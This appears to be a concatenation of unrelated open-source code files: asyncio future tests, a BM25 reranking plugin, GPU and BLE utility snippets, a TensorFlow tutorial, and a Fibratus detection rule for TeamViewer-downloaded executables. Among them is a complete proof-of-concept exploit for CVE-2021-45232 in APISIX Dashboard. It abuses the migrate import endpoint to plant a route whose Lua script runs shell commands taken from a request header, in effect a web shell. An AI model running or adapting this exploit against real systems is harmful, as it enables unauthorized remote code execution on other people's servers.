self._limit = 0
def prepare(self):
super(BaseHandler, self).prepare()
self._skip = abs(self._params['skip']) if self._params.get(
'skip', None) else 0
self._limit = abs(self._params['limit']) if self._params.get(
'limit', None) else 20
actions.inc_qps()
|
py3nvml/__init__.py
|
m5imunovic/py3nvml
| 216 |
116446
|
<gh_stars>100-1000
from __future__ import absolute_import
from py3nvml import py3nvml
from py3nvml import nvidia_smi
from py3nvml.utils import grab_gpus, get_free_gpus, get_num_procs
__all__ = ['py3nvml', 'nvidia_smi', 'grab_gpus', 'get_free_gpus', 'get_num_procs']
__version__ = "0.2.6"
|
examples/context_eddystone_beacon.py
|
ddunmire/python-bleson
| 103 |
116460
|
#!/usr/bin/env python3
import sys
from time import sleep
from bleson import get_provider, EddystoneBeacon
# Get the wait time from the first script argument or default it to 10 seconds
WAIT_TIME = int(sys.argv[1]) if len(sys.argv)>1 else 10
with EddystoneBeacon(get_provider().get_adapter(), 'https://www.bluetooth.com/'):
sleep(WAIT_TIME)
|
filaments/teamviewer_remote_file_copy.py
|
Monkeyman21/fibratus
| 1,604 |
116461
|
# Copyright 2019-2020 by <NAME> (RabbitStack)
# All Rights Reserved.
# http://rabbitstack.github.io
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Identifies an executable or script file remotely downloaded via a TeamViewer transfer session
"""
from utils.dotdict import dotdictify
__author__ = '<NAME>'
__tags__ = ['Command and Control', 'TeamViewer']
__references__ = ['https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html']
__severity__ = 'medium'
__catalog__ = {
'framework': 'MITRE ATT&CK',
'technique_id': 'T1105',
'technique_name': 'Ingress Tool Transfer',
'technique_ref': 'https://attack.mitre.org/techniques/T1105/',
'tactic_id': 'TA0011',
'tactic_name': 'Command and Control',
'tactic_ref': 'https://attack.mitre.org/tactics/TA0011/'
}
extensions = [
'.exe',
'.dll',
'.scr',
'.com',
'.bar',
'.ps1',
'.vbs',
'.vbe',
'.js',
'.wsh',
'.hta'
]
def on_init():
kfilter("kevt.name = 'CreateFile' and ps.name = 'TeamViewer.exe' and file.operation = 'create' "
"and file.extension in (%s)"
% (', '.join([f'\'{ext}\'' for ext in extensions])))
@dotdictify
def on_next_kevent(kevent):
emit_alert(
f'Remote File Copy via TeamViewer',
f'TeamViewer downloaded an executable or script file {kevent.kparams.file_name} via transfer session',
severity=__severity__,
tags=[__tags__]
)
|
flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/model.py
|
ehoeffner/flaskerize
| 119 |
116484
|
<filename>flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/model.py
from sqlalchemy import Integer, Column, String
from app import db # noqa
from .interface import WidgetInterface
class Widget(db.Model): # type: ignore
"""A snazzy Widget"""
__tablename__ = "widget"
widget_id = Column(Integer(), primary_key=True)
name = Column(String(255))
purpose = Column(String(255))
def update(self, changes: WidgetInterface):
for key, val in changes.items():
setattr(self, key, val)
return self
|
devel/test_timeout.py
|
saidbakr/darkhttpd
| 788 |
116509
|
#!/usr/bin/env python3
# This is run by the "run-tests" script.
import unittest
import signal
import socket
class TestTimeout(unittest.TestCase):
def test_timeout(self):
port = 12346
s = socket.socket()
s.connect(("0.0.0.0", port))
# Assumes the server has --timeout 1
signal.alarm(3)
# Expect to get EOF before the alarm fires.
ret = s.recv(1024)
signal.alarm(0)
s.close()
self.assertEqual(ret, b'')
if __name__ == '__main__':
unittest.main()
# vim:set ts=4 sw=4 et:
|
src/holodeck/__init__.py
|
LaudateCorpus1/holodeck
| 518 |
116518
|
<reponame>LaudateCorpus1/holodeck<gh_stars>100-1000
"""Holodeck is a high fidelity simulator for reinforcement learning.
"""
__version__ = "0.3.2.dev0"
from holodeck.holodeck import make
from holodeck.packagemanager import *
__all__ = [
"agents",
"environments",
"exceptions",
"holodeck",
"make",
"packagemanager",
"sensors",
]
|
nboost/plugins/prerank.py
|
rajeshkp/nboost
| 646 |
116531
|
<reponame>rajeshkp/nboost
from nboost.plugins import Plugin
from nboost.delegates import ResponseDelegate
from nboost.database import DatabaseRow
import numpy as np
from multiprocessing import Pool, cpu_count
import math
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
import nltk
nltk.download('stopwords')
nltk.download('punkt')
class BM25:
def __init__(self, corpus, tokenizer=None):
self.corpus_size = len(corpus)
self.avgdl = 0
self.doc_freqs = []
self.idf = {}
self.doc_len = []
self.tokenizer = tokenizer
if tokenizer:
corpus = self._tokenize_corpus(corpus)
nd = self._initialize(corpus)
self._calc_idf(nd)
def _initialize(self, corpus):
nd = {} # word -> number of documents with word
num_doc = 0
for document in corpus:
self.doc_len.append(len(document))
num_doc += len(document)
frequencies = {}
for word in document:
if word not in frequencies:
frequencies[word] = 0
frequencies[word] += 1
self.doc_freqs.append(frequencies)
for word, freq in frequencies.items():
if word not in nd:
nd[word] = 0
nd[word] += 1
self.avgdl = num_doc / self.corpus_size
return nd
def _tokenize_corpus(self, corpus):
pool = Pool(cpu_count())
tokenized_corpus = pool.map(self.tokenizer, corpus)
return tokenized_corpus
def _calc_idf(self, nd):
raise NotImplementedError()
def get_scores(self, query):
raise NotImplementedError()
def get_top_n(self, query, documents, n=5):
assert self.corpus_size == len(documents), "The documents given don't match the index corpus!"
scores = self.get_scores(query)
top_n = np.argsort(scores)[::-1][:n]
return [documents[i] for i in top_n]
class BM25Okapi(BM25):
def __init__(self, corpus, tokenizer=None, k1=1.5, b=0.75, epsilon=0.25):
self.k1 = k1
self.b = b
self.epsilon = epsilon
super().__init__(corpus, tokenizer)
def _calc_idf(self, nd):
"""
Calculates frequencies of terms in documents and in corpus.
This algorithm sets a floor on the idf values to eps * average_idf
"""
# collect idf sum to calculate an average idf for epsilon value
idf_sum = 0
# collect words with negative idf to set them a special epsilon value.
# idf can be negative if word is contained in more than half of documents
negative_idfs = []
for word, freq in nd.items():
idf = math.log(self.corpus_size - freq + 0.5) - math.log(freq + 0.5)
self.idf[word] = idf
idf_sum += idf
if idf < 0:
negative_idfs.append(word)
self.average_idf = idf_sum / len(self.idf)
eps = self.epsilon * self.average_idf
for word in negative_idfs:
self.idf[word] = eps
def get_scores(self, query):
"""
The ATIRE BM25 variant uses an idf function which uses a log(idf) score. To prevent negative idf scores,
this algorithm also adds a floor to the idf value of epsilon.
See [<NAME>., <NAME>, <NAME>, Towards an Efficient and Effective Search Engine] for more info
:param query:
:return:
"""
score = np.zeros(self.corpus_size)
doc_len = np.array(self.doc_len)
for q in query:
q_freq = np.array([(doc.get(q) or 0) for doc in self.doc_freqs])
score += (self.idf.get(q) or 0) * (q_freq * (self.k1 + 1) /
(q_freq + self.k1 * (1 - self.b + self.b * doc_len / self.avgdl)))
return score
class PrerankPlugin(Plugin):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.ps = PorterStemmer()
def on_response(self, response: ResponseDelegate, db_row: DatabaseRow):
query = response.request.query
choices = response.cvalues
corpus = [self.tokenize(choice) for choice in choices]
bm25 = BM25Okapi(corpus)
ranks = np.argsort(bm25.get_scores(self.tokenize(query)))[::-1]
reranked_choices = [response.choices[rank] for rank in ranks]
response.choices = reranked_choices
response.choices = response.choices[:50]
def tokenize(self, paragraph):
words = [self.ps.stem(word) for word in word_tokenize(paragraph)]
filtered_words = [word for word in words if word not in stopwords.words('english')]
return filtered_words
def rank(self, query, choices):
pass
|
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/r/redefine_loop.py
|
ciskoinch8/vimrc
| 463 |
116539
|
<gh_stars>100-1000
"""Test case for variable redefined in inner loop."""
for item in range(0, 5):
print("hello")
for item in range(5, 10): #[redefined-outer-name]
print(item)
print("yay")
print(item)
print("done")
|
tests/test_futures.py
|
PyO3/tokio
| 239 |
116550
|
<filename>tests/test_futures.py
# Copied from the uvloop project. If you add a new unittest here,
# please consider contributing it to the uvloop project.
#
# Portions copyright (c) 2015-present MagicStack Inc. http://magic.io
import asyncio
import concurrent.futures
import re
import sys
import threading
from asyncio import test_utils
from test import support
from unittest import mock
import pytest
@pytest.fixture
def make_callback():
# Create a callback function that appends thing to bag.
def _make_callback(bag, thing):
def bag_appender(future):
bag.append(thing)
return bag_appender
yield _make_callback
def _fakefunc(f):
return f
def first_cb():
pass
def last_cb():
pass
def test_future_initial_state(create_future):
f = create_future()
assert not f.cancelled()
assert not f.done()
f.cancel()
assert f.cancelled()
def test_future_cancel(create_future):
f = create_future()
assert f.cancel()
assert f.cancelled()
assert f.done()
with pytest.raises(asyncio.CancelledError):
f.result()
with pytest.raises(asyncio.CancelledError):
f.exception()
with pytest.raises(asyncio.InvalidStateError):
f.set_result(None)
with pytest.raises(asyncio.InvalidStateError):
f.set_exception(None)
assert not f.cancel()
def test_future_result(create_future):
f = create_future()
with pytest.raises(asyncio.InvalidStateError):
f.result()
f.set_result(42)
assert not f.cancelled()
assert f.done()
assert f.result() == 42
assert f.exception() is None
with pytest.raises(asyncio.InvalidStateError):
f.set_result(None)
with pytest.raises(asyncio.InvalidStateError):
f.set_exception(None)
assert not f.cancel()
def test_future_exception(create_future):
exc = RuntimeError()
f = create_future()
with pytest.raises(asyncio.InvalidStateError):
f.exception()
if sys.version_info[:3] > (3, 5, 1):
# StopIteration cannot be raised into a Future - CPython issue26221
with pytest.raises(TypeError) as excinfo:
f.set_exception(StopIteration)
excinfo.match("StopIteration .* cannot be raised")
f.set_exception(exc)
assert not f.cancelled()
assert f.done()
with pytest.raises(RuntimeError):
f.result()
assert f.exception() == exc
with pytest.raises(asyncio.InvalidStateError):
f.set_result(None)
with pytest.raises(asyncio.InvalidStateError):
f.set_exception(None)
assert not f.cancel()
def test_future_exception_class(create_future):
f = create_future()
f.set_exception(RuntimeError)
assert isinstance(f.exception(), RuntimeError)
def test_future_yield_from_twice(create_future):
f = create_future()
def fixture():
yield 'A'
x = yield from f
yield 'B', x
y = yield from f
yield 'C', y
g = fixture()
assert next(g) == 'A' # yield 'A'.
assert next(g) == f # First yield from f.
f.set_result(42)
assert next(g) == ('B', 42) # yield 'B', x.
# The second "yield from f" does not yield f.
assert next(g) == ('C', 42) # yield 'C', y.
@pytest.mark.skip
def test_future_repr(loop, match):
loop.set_debug(True)
f_pending_debug = loop.create_future()
frame = f_pending_debug._source_traceback[-1]
assert repr(f_pending_debug) == \
'<Future pending created at %s:%s>' % (frame[0], frame[1])
f_pending_debug.cancel()
loop.set_debug(False)
f_pending = loop.create_future()
assert repr(f_pending) == '<Future pending>'
f_pending.cancel()
f_cancelled = loop.create_future()
f_cancelled.cancel()
assert repr(f_cancelled) == '<Future cancelled>'
f_result = loop.create_future()
f_result.set_result(4)
assert repr(f_result) == '<Future finished result=4>'
assert f_result.result() == 4
exc = RuntimeError()
f_exception = loop.create_future()
f_exception.set_exception(exc)
assert repr(f_exception) == '<Future finished exception=RuntimeError()>'
assert f_exception.exception() is exc
def func_repr(func):
filename, lineno = test_utils.get_function_source(func)
text = '%s() at %s:%s' % (func.__qualname__, filename, lineno)
return re.escape(text)
f_one_callbacks = loop.create_future()
f_one_callbacks.add_done_callback(_fakefunc)
fake_repr = func_repr(_fakefunc)
assert match(repr(f_one_callbacks),
r'<Future pending cb=\[%s\]>' % fake_repr)
f_one_callbacks.cancel()
assert repr(f_one_callbacks) == '<Future cancelled>'
f_two_callbacks = loop.create_future()
f_two_callbacks.add_done_callback(first_cb)
f_two_callbacks.add_done_callback(last_cb)
first_repr = func_repr(first_cb)
last_repr = func_repr(last_cb)
assert match(repr(f_two_callbacks),
r'<Future pending cb=\[%s, %s\]>' % (first_repr, last_repr))
f_many_callbacks = loop.create_future()
f_many_callbacks.add_done_callback(first_cb)
for i in range(8):
f_many_callbacks.add_done_callback(_fakefunc)
f_many_callbacks.add_done_callback(last_cb)
cb_regex = r'%s, <8 more>, %s' % (first_repr, last_repr)
assert match(repr(f_many_callbacks),
r'<Future pending cb=\[%s\]>' % cb_regex)
f_many_callbacks.cancel()
assert repr(f_many_callbacks) == '<Future cancelled>'
@pytest.mark.skipif(sys.version_info[:3] < (3, 5, 1),
reason='old python version')
def test_future_copy_state(create_future):
from asyncio.futures import _copy_future_state
f = create_future()
f.set_result(10)
newf = create_future()
_copy_future_state(f, newf)
assert newf.done()
assert newf.result() == 10
f_exception = create_future()
f_exception.set_exception(RuntimeError())
newf_exception = create_future()
_copy_future_state(f_exception, newf_exception)
assert newf_exception.done()
with pytest.raises(RuntimeError):
newf_exception.result()
f_cancelled = create_future()
f_cancelled.cancel()
newf_cancelled = create_future()
_copy_future_state(f_cancelled, newf_cancelled)
assert newf_cancelled.cancelled()
def test_future_tb_logger_abandoned(create_future):
with mock.patch('asyncio.base_events.logger') as m_log:
fut = create_future()
del fut
assert not m_log.error.called
def test_future_tb_logger_result_unretrieved(create_future):
with mock.patch('asyncio.base_events.logger') as m_log:
fut = create_future()
fut.set_result(42)
del fut
assert not m_log.error.called
def test_future_wrap_future(loop):
def run(arg):
return (arg, threading.get_ident())
ex = concurrent.futures.ThreadPoolExecutor(1)
f1 = ex.submit(run, 'oi')
f2 = asyncio.wrap_future(f1, loop=loop)
res, ident = loop.run_until_complete(f2)
assert asyncio.isfuture(f2)
assert res == 'oi'
assert ident != threading.get_ident()
def test_future_wrap_future_future(create_future):
f1 = create_future()
f2 = asyncio.wrap_future(f1)
assert f1 is f2
def test_future_wrap_future_use_global_loop(loop):
with mock.patch('asyncio.futures.events') as events:
events.get_event_loop = lambda: loop
def run(arg):
return (arg, threading.get_ident())
ex = concurrent.futures.ThreadPoolExecutor(1)
f1 = ex.submit(run, 'oi')
f2 = asyncio.wrap_future(f1)
assert loop is f2._loop
def test_future_wrap_future_cancel(loop, run_briefly):
f1 = concurrent.futures.Future()
f2 = asyncio.wrap_future(f1, loop=loop)
f2.cancel()
run_briefly(loop)
assert f1.cancelled()
assert f2.cancelled()
def test_future_wrap_future_cancel2(loop, run_briefly):
f1 = concurrent.futures.Future()
f2 = asyncio.wrap_future(f1, loop=loop)
f1.set_result(42)
f2.cancel()
run_briefly(loop)
assert not f1.cancelled()
assert f1.result() == 42
assert f2.cancelled()
@pytest.mark.skip
def test_future_source_traceback(loop):
loop.set_debug(True)
future = loop.create_future()
lineno = sys._getframe().f_lineno - 1
assert isinstance(future._source_traceback, list)
assert future._source_traceback[-1][:3] == (
__file__, lineno, 'test_future_source_traceback')
@pytest.mark.parametrize('debug', [True, False])
def check_future_exception_never_retrieved(loop, debug, run_briefly):
last_ctx = None
def handler(loop, context):
nonlocal last_ctx
last_ctx = context
loop.set_debug(debug)
loop.set_exception_handler(handler)
def memory_error():
try:
raise MemoryError()
except BaseException as exc:
return exc
exc = memory_error()
future = loop.create_future()
if debug:
# source_traceback = future._source_traceback
future.set_exception(exc)
future = None
support.gc_collect()
run_briefly(loop)
assert last_ctx is not None
assert last_ctx['exception'] is exc
assert last_ctx['message'] == 'Future exception was never retrieved'
if debug:
tb = last_ctx['source_traceback']
assert tb[-2].name == 'check_future_exception_never_retrieved'
def test_future_wrap_future2(loop):
from uvloop.loop import _wrap_future
def run(arg):
return (arg, threading.get_ident())
ex = concurrent.futures.ThreadPoolExecutor(1)
f1 = ex.submit(run, 'oi')
f2 = _wrap_future(f1, loop=loop)
res, ident = loop.run_until_complete(f2)
assert asyncio.isfuture(f2)
assert res == 'oi'
assert ident != threading.get_ident()
def test_future_wrap_future_future3(create_future):
from uvloop.loop import _wrap_future
f1 = create_future()
f2 = _wrap_future(f1)
assert f1 is f2
def test_future_wrap_future_cancel4(loop, run_briefly):
from uvloop.loop import _wrap_future
f1 = concurrent.futures.Future()
f2 = _wrap_future(f1, loop=loop)
f2.cancel()
run_briefly(loop)
assert f1.cancelled()
assert f2.cancelled()
def test_future_wrap_future_cancel5(loop, run_briefly):
from uvloop.loop import _wrap_future
f1 = concurrent.futures.Future()
f2 = _wrap_future(f1, loop=loop)
f1.set_result(42)
f2.cancel()
run_briefly(loop)
assert not f1.cancelled()
assert f1.result() == 42
assert f2.cancelled()
def test_future_callbacks_invoked_on_set_result(
loop, create_future, make_callback, run_briefly):
bag = []
f = create_future()
f.add_done_callback(make_callback(bag, 42))
f.add_done_callback(make_callback(bag, 17))
assert bag == []
f.set_result('foo')
run_briefly(loop)
assert bag == [42, 17]
assert f.result() == 'foo'
def test_future_callbacks_invoked_on_set_exception(
loop, create_future, make_callback, run_briefly):
bag = []
f = create_future()
f.add_done_callback(make_callback(bag, 100))
assert bag == []
exc = RuntimeError()
f.set_exception(exc)
run_briefly(loop)
assert bag == [100]
assert f.exception() == exc
def test_future_remove_done_callback(
loop, create_future, make_callback, run_briefly):
bag = []
f = create_future()
cb1 = make_callback(bag, 1)
cb2 = make_callback(bag, 2)
cb3 = make_callback(bag, 3)
# Add one cb1 and one cb2.
f.add_done_callback(cb1)
f.add_done_callback(cb2)
# One instance of cb2 removed. Now there's only one cb1.
assert f.remove_done_callback(cb2) == 1
# Never had any cb3 in there.
assert f.remove_done_callback(cb3) == 0
# After this there will be 6 instances of cb1 and one of cb2.
f.add_done_callback(cb2)
for i in range(5):
f.add_done_callback(cb1)
# Remove all instances of cb1. One cb2 remains.
assert f.remove_done_callback(cb1) == 6
assert bag == []
f.set_result('foo')
run_briefly(loop)
assert bag == [2]
assert f.result() == 'foo'
|
2021/CVE-2021-45232/poc/others/apisix_dashboard_rce.py
|
hjyuan/reapoc
| 421 |
116552
|
#!/usr/bin/env python3
import zlib
import json
import random
import requests
import string
import sys
eval_config = {
"Counsumers": [],
"Routes": [
{
"id": str(random.randint(100000000000000000, 1000000000000000000)),
"create_time": 1640674554,
"update_time": 1640677637,
"uris": [
"/rce"
],
"name": "rce",
"methods": [
"GET",
"POST",
"PUT",
"DELETE",
"PATCH",
"HEAD",
"OPTIONS",
"CONNECT",
"TRACE"
],
"script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)",
"status": 1
}
],
"Services": [],
"SSLs": [],
"Upstreams": [],
"Scripts": [],
"GlobalPlugins": [],
"PluginConfigs": []
}
def random_str():
return ''.join(random.choices(string.ascii_letters + string.digits, k=6))
def calc_crc(data):
crc32 = zlib.crc32(data) & 0xffffffff
return crc32.to_bytes(4, byteorder="big")
def export_data(url):
r = requests.get(url + "/apisix/admin/migrate/export")
return r.text[:-4]
def import_data(url, data):
data = json.dumps(data).encode()
crc32 = calc_crc(data)
files = {"file": ("data", data + crc32, "text/data")}
resp = requests.post(url + "/apisix/admin/migrate/import", files=files)
# print(resp.text)
if resp.json().get("code", -1) == 0:
return True
else:
return False
if __name__ == "__main__":
if len(sys.argv) != 2:
print("python " + sys.argv[0] + " http://127.0.0.1:9000")
exit()
url = sys.argv[1]
if url.endswith("/"):
url = url[:-1]
uri = random_str()
eval_config["Routes"][0]["uris"] = [ "/" + uri]
eval_config["Routes"][0]["name"] = uri
if import_data(url, eval_config):
print("attack success")
print("uri is: " + "/" + uri)
else:
print("attack error")
|
apps/base/views/product_brand.py
|
youssriaboelseod/pyerp
| 115 |
116590
|
<reponame>youssriaboelseod/pyerp<filename>apps/base/views/product_brand.py
# Django Library
from django.contrib.auth.mixins import LoginRequiredMixin
from django.utils.translation import ugettext_lazy as _
# Localfolder Library
from ..models import PyProductBrand
from .web_father import (
FatherCreateView, FatherDeleteView, FatherDetailView, FatherListView,
FatherUpdateView)
OBJECT_LIST_FIELDS = [
{'string': _("Name"), 'field': 'name'},
]
OBJECT_FORM_FIELDS = ['name']
class ProductBrandListView(LoginRequiredMixin, FatherListView):
model = PyProductBrand
template_name = 'base/list.html'
extra_context = {'fields': OBJECT_LIST_FIELDS}
class ProductBrandDetailView(LoginRequiredMixin, FatherDetailView):
model = PyProductBrand
template_name = 'base/detail.html'
extra_context = {'fields': OBJECT_LIST_FIELDS}
class ProductBrandCreateView(LoginRequiredMixin, FatherCreateView):
model = PyProductBrand
fields = OBJECT_FORM_FIELDS
template_name = 'base/form.html'
class ProductBrandUpdateView(LoginRequiredMixin, FatherUpdateView):
model = PyProductBrand
fields = OBJECT_FORM_FIELDS
template_name = 'base/form.html'
class ProductBrandDeleteView(LoginRequiredMixin, FatherDeleteView):
model = PyProductBrand
|
sdk/storage/azure-storage-blob/tests/perfstress_tests/T1_legacy_tests/upload_block.py
|
rsdoherty/azure-sdk-for-python
| 2,728 |
116599
|
<reponame>rsdoherty/azure-sdk-for-python<filename>sdk/storage/azure-storage-blob/tests/perfstress_tests/T1_legacy_tests/upload_block.py<gh_stars>1000+
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import uuid
from azure_devtools.perfstress_tests import get_random_bytes
from ._test_base_legacy import _LegacyContainerTest
class LegacyUploadBlockTest(_LegacyContainerTest):
def __init__(self, arguments):
super().__init__(arguments)
self.blob_name = "blobblocktest-" + str(uuid.uuid4())
self.block_id = str(uuid.uuid4())
self.data = get_random_bytes(self.args.size)
def run_sync(self):
self.service_client.put_block(
container_name=self.container_name,
blob_name=self.blob_name,
block=self.data,
block_id=self.block_id)
async def run_async(self):
raise NotImplementedError("Async not supported for legacy T1 tests.")
|
angr/concretization_strategies/range.py
|
Kyle-Kyle/angr
| 6,132 |
116614
|
from . import SimConcretizationStrategy
class SimConcretizationStrategyRange(SimConcretizationStrategy):
"""
Concretization strategy that resolves addresses to a range.
"""
def __init__(self, limit, **kwargs): #pylint:disable=redefined-builtin
super(SimConcretizationStrategyRange, self).__init__(**kwargs)
self._limit = limit
def _concretize(self, memory, addr):
mn,mx = self._range(memory, addr)
if mx - mn <= self._limit:
return self._eval(memory, addr, self._limit)
|
nnef_tools/io/nnef/helpers.py
|
dvorotnev/NNEF-Tools
| 193 |
116638
|
# Copyright (c) 2020 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import tarfile
def tgz_compress(dir_path, file_path, compression_level=0):
target_directory = os.path.dirname(file_path)
if target_directory and not os.path.exists(target_directory):
os.makedirs(target_directory)
with tarfile.open(file_path, 'w:gz', compresslevel=compression_level) as tar:
for file_ in os.listdir(dir_path):
tar.add(dir_path + '/' + file_, file_)
def tgz_extract(file_path, dir_path):
if dir_path and not os.path.exists(dir_path):
os.makedirs(dir_path)
with tarfile.open(file_path, 'r:gz') as tar:
tar.extractall(dir_path)
|
examples/blocks/get_block_reward.py
|
adamzhang1987/py-etherscan-api
| 458 |
116660
|
from etherscan.blocks import Blocks
import json
with open('../../api_key.json', mode='r') as key_file:
key = json.loads(key_file.read())['key']
api = Blocks(api_key=key)
reward = api.get_block_reward(2165403)
print(reward)
|
rsbook_code/utilities/search.py
|
patricknaughton01/RoboticSystemsBook
| 116 |
116692
|
"""
Includes Dijkstra's algorithm and two A* implementations.
"""
from __future__ import print_function,division
import heapq #for a fast priority queue implementation
def predecessor_traverse(p,s,g):
"""Used by dijkstra's algorithm to traverse a predecessor dictionary"""
L = []
v = g
while v is not None:
L.append(v)
v = p.get(v,None)
#rather than prepending, we appended and now we'll reverse. This is a more efficient than prepending
return L[::-1]
def dijkstras(G,s,g,cost=(lambda v,w:1),verbose=1):
"""Completes a shortest-path search on graph G.
Args:
G (AdjListGraph or networkx Graph/DiGraph): the graph to search
s: the start node
g: the goal node or a goal test
cost (optional): a callback function c(v,w) that returns the edge cost
verbose (optional): if nonzero, will print information about search
progress.
Returns:
tuple: a triple (path,distances,predecessors) giving
- path: a list or None: either the path of nodes from s to g with
minimum cost, or None if no path exists.
- distances: a dictionary mapping nodes to distances from start
- predecessors: a dictionary mapping nodes to parent nodes
that can be walked by ``predecessor_traverse`` to get the optimal
path to any reached node.
"""
if not callable(g):
gtest = lambda x,goal=g: x==g
else:
gtest = g
d = dict((v,float('inf')) for v in G.nodes())
p = dict((v,None) for v in G.nodes())
d[s] = 0
Q = [(0,s)] #each element is a tuple (c,v) with c=cost from start, v=vertex
nnodes = 0
while len(Q) > 0:
c,v = heapq.heappop(Q) #get the element in the queue with the least value of c
nnodes += 1
if gtest(v):
#found a path
if verbose: print("Dijkstra's succeeded in",nnodes,"iterations")
return predecessor_traverse(p,s,v),d,p
for w in G.neighbors(v):
dcand = d[v] + cost(v,w) #this is the cost of going through v to w
if dcand < d[w]:
#going through v is optimal
#if the predecessor of w is not None, then we'll have to adjust the heap
if p[w] is not None:
Q = [(c,x) for (c,x) in Q if x is not w]
heapq.heapify(Q)
d[w] = dcand
p[w] = v
#put w on the queue
heapq.heappush(Q,(dcand,w))
#no path found
if verbose: print("Dijkstra's failed in",nnodes,"iterations")
return None,d,p
def astar(G,s,g,cost=(lambda v,w:1),heuristic=(lambda v:0),verbose=1):
"""Completes an A* search on graph G.
Args:
G (AdjListGraph, networkx Graph / DiGraph): the graph to search.
s: the start node
g: the goal node or goal test
cost (optional): a callback function c(v,w) that returns the edge cost
heuristic (optional): a callback function h(v) that returns the
heuristic cost-to-go between v and g
verbose (optional): if nonzero, will print information about search
progress.
Returns:
tuple: a triple (path,distances,predecessors) giving
- path: a list or None: either the path of nodes from s to g with
minimum cost, or None if no path exists.
- distances: a dictionary mapping nodes to distances from start
- predecessors: a dictionary mapping nodes to parent nodes
that can be walked by ``predecessor_traverse`` to get the optimal
path to any reached node.
"""
if not callable(g):
gtest = lambda x,goal=g: x==g
else:
gtest = g
d = dict((v,float('inf')) for v in G.nodes())
p = dict((v,None) for v in G.nodes())
d[s] = 0
Q = [(0,0,s)] #each element is a tuple (f,-c,v) with f=c + heuristic(v), c=cost from start, v=vertex
nnodes = 0
while len(Q) > 0:
f,minus_c,v = heapq.heappop(Q) #get the element in the queue with the least value of c
nnodes += 1
if gtest(v):
#found a path
if verbose: print("A* succeeded in",nnodes,"iterations")
return predecessor_traverse(p,s,v),d,p
for w in G.neighbors(v):
dcand = d[v] + cost(v,w) #this is the cost of going through v to w
if dcand < d[w]:
#going through v is optimal
#if the predecessor of w is not None, then we'll have to adjust the heap
if p[w] is not None:
Q = [(f,c,x) for (f,c,x) in Q if x is not w]
heapq.heapify(Q)
d[w] = dcand
p[w] = v
#put w back on the queue, with the heuristic value as its priority
heapq.heappush(Q,(dcand+heuristic(w),-dcand,w))
#no path found
if verbose: print("A* failed in",nnodes,"iterations")
return None,d,p
def astar_implicit(successors,s,g,cost=(lambda v,w:1),heuristic=(lambda v:0),verbose=1):
"""Completes an A* search on a large/infinite implicit graph.
Args:
successors: a callback function s(v) that returns a list of neighbors
of a node v.
s: the start node
g: the goal node or goal test
cost (optional): a callback function c(v,w) that returns the edge cost
heuristic (optional): a callback function h(v) that returns the
heuristic cost-to-go between v and g
verbose (optional): if nonzero, will print information about search
progress.
Returns:
tuple: a triple (path,distances,predecessors) giving
- path: a list or None: either the path of nodes from s to g with
minimum cost, or None if no path exists.
- distances: a dictionary mapping reached nodes to distances from start
- predecessors: a dictionary mapping reached nodes to parent nodes
that can be walked by ``predecessor_traverse`` to get the optimal
path to any reached node.
"""
if not callable(g):
gtest = lambda x,goal=g: x==g
else:
gtest = g
inf = float('inf')
d = dict()
p = dict()
d[s] = 0
Q = [(0,0,s)] #each element is a tuple (f,-c,v) with f=c + heuristic(v), c=cost from start, v=vertex
nnodes = 0
while len(Q) > 0:
f,minus_c,v = heapq.heappop(Q) #get the element in the queue with the least value of c
nnodes += 1
if gtest(v):
#found a path
if verbose: print("A* succeeded in",nnodes,"iterations")
return predecessor_traverse(p,s,v),d,p
for w in successors(v):
dcand = d[v] + cost(v,w) #this is the cost of going through v to w
if dcand < d.get(w,float('inf')):
#going through v is optimal
#if the predecessor of w is not None, then we'll have to adjust the heap
if w in p:
Q = [(f,c,x) for (f,c,x) in Q if x is not w]
heapq.heapify(Q)
d[w] = dcand
p[w] = v
#put w back on the queue, with the heuristic value as its priority
heapq.heappush(Q,(dcand+heuristic(w),-dcand,w))
#no path found
if verbose: print("A* failed in",nnodes,"iterations")
return None,d,p
|
1-Introduction/basic_operations.py
|
haigh1510/TensorFlow2.0-Examples
| 1,775 |
116694
|
<filename>1-Introduction/basic_operations.py
#! /usr/bin/env python
# coding=utf-8
#================================================================
# Copyright (C) 2019 * Ltd. All rights reserved.
#
# Editor : VIM
# File name : basic_operations.py
# Author : YunYang1994
# Created date: 2019-03-08 14:32:57
# Description :
#
#================================================================
"""
Basic Operations example using TensorFlow library.
"""
import tensorflow as tf
###======================================= assign value ===================================#
a = tf.ones([2,3])
print(a)
# a[0,0] = 10 => TypeError: 'tensorflow.python.framework.ops.EagerTensor' object does not support item assignment
a = tf.Variable(a)
a[0,0].assign(10)
b = a.read_value()
print(b)
###======================================= add, multiply, div. etc ===================================#
a = tf.constant(2)
b = tf.constant(3)
print("a + b :" , a.numpy() + b.numpy())
print("Addition with constants: ", a+b)
print("Addition with constants: ", tf.add(a, b))
print("a * b :" , a.numpy() * b.numpy())
print("Multiplication with constants: ", a*b)
print("Multiplication with constants: ", tf.multiply(a, b))
# ----------------
# More in details:
# Matrix Multiplication from TensorFlow official tutorial
# Create a Constant op that produces a 1x2 matrix. The op is
# added as a node to the default graph.
#
# The value returned by the constructor represents the output
# of the Constant op.
